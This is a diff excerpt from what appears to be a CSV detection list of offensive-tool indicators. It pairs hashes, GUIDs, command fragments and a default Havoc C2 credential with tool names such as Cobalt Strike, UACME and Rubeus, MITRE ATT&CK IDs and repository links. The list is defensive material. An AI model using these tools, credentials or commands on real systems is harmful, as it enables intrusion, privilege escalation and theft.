TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*5e98194a01c6b48fa582a6a9fcbb92d6*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*5e98194a01c6b48fa582a6a9fcbb92d6*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" -"*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" -"*5spider:password1234*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" 
-"*60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*5spider:password1234*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from 
Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - 
T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*639EF517-FCFC-408E-9500-71F0DC0458DB*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*-64 -format=reflective-dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*6563686f2048656c6c6f204261636b646f6f72*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - 
TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" -"*658C8B7F-3664-4A95-9572-A3E5871DFC06*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*66e0681a500c726ed52e5ea9423d2654*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*658C8B7F-3664-4A95-9572-A3E5871DFC06*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*66e0681a500c726ed52e5ea9423d2654*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD 
Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using 
WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*7.exe a -mx3 ad.7z ad_*.txt*","offensive_tool_keyword","7zip","7zip command to zip results from adfind scans. 
attackers perform Active Directory collection using AdFind in batch scriptsfrom C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1074.001 - T1083 - T1560.001 - T1105","TA0003 - TA0007 - TA0009","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*70527328-DCEC-4BA7-9958-B5BC3E48CE99*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*70527328-DCEC-4BA7-9958-B5BC3E48CE99*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*713724C3-2367-49FA-B03F-AB4B336FB405*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" -"*7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*73948912-CEBD-48ED-85E2-85FCD1D4F560*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" -"*73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*7443/new/payloads*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*73948912-CEBD-48ED-85E2-85FCD1D4F560*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7443/new/payloads*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*76FFA92B-429B-4865-970D-4E7678AC34EA*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" 
